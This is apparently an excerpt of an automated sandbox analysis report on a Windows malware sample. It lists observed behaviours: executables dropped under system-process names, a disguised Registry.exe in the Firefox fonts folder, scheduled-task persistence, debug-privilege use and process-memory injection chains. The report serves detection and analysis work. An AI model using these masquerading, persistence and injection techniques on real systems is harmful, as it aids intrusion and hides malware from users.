File created C:\Windows\ShellExperiences\taskhostw.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Windows\TAPI\csrss.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Windows\es-ES\RCXBFFA.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Windows\es-ES\winlogon.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Windows\es-ES\cc11b995f2a76d C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Windows\ShellExperiences\ea9f0e6c9e2dcd C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Windows\TAPI\886983d96e3d3e C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Windows\ShellExperiences\taskhostw.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3216 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 3216 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 3216 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 2908 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 2908 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 2908 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 2908 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 2908 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 2908 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 2908 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 3216 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\cmd.exe
PID 3216 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\cmd.exe
PID 3720 wrote to memory of 4912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 3720 wrote to memory of 4912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 3720 wrote to memory of 1712 N/A C:\Windows\System32\cmd.exe C:\Program Files\Mozilla Firefox\fonts\Registry.exe
PID 3720 wrote to memory of 1712 N/A C:\Windows\System32\cmd.exe C:\Program Files\Mozilla Firefox\fonts\Registry.exe
PID 1712 wrote to memory of 1800 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Windows\System32\WScript.exe
PID 1712 wrote to memory of 1800 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Windows\System32\WScript.exe
PID 1712 wrote to memory of 4240 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Windows\System32\WScript.exe
PID 1712 wrote to memory of 4240 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Windows\System32\WScript.exe
PID 1712 wrote to memory of 820 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe
PID 1712 wrote to memory of 820 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe
PID 1712 wrote to memory of 820 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe
PID 820 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe
PID 820 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe
PID 820 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe
PID 820 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe
PID 820 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe
PID 820 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe
PID 820 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe
PID 1800 wrote to memory of 1692 N/A C:\Windows\System32\WScript.exe C:\Program Files\Mozilla Firefox\fonts\Registry.exe
PID 1800 wrote to memory of 1692 N/A C:\Windows\System32\WScript.exe C:\Program Files\Mozilla Firefox\fonts\Registry.exe
PID 1692 wrote to memory of 1592 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Windows\System32\WScript.exe
PID 1692 wrote to memory of 1592 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Windows\System32\WScript.exe
PID 1692 wrote to memory of 3552 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Windows\System32\WScript.exe
PID 1692 wrote to memory of 3552 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Windows\System32\WScript.exe
PID 1692 wrote to memory of 4224 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe
PID 1692 wrote to memory of 4224 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe
PID 1692 wrote to memory of 4224 N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe
PID 4224 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe
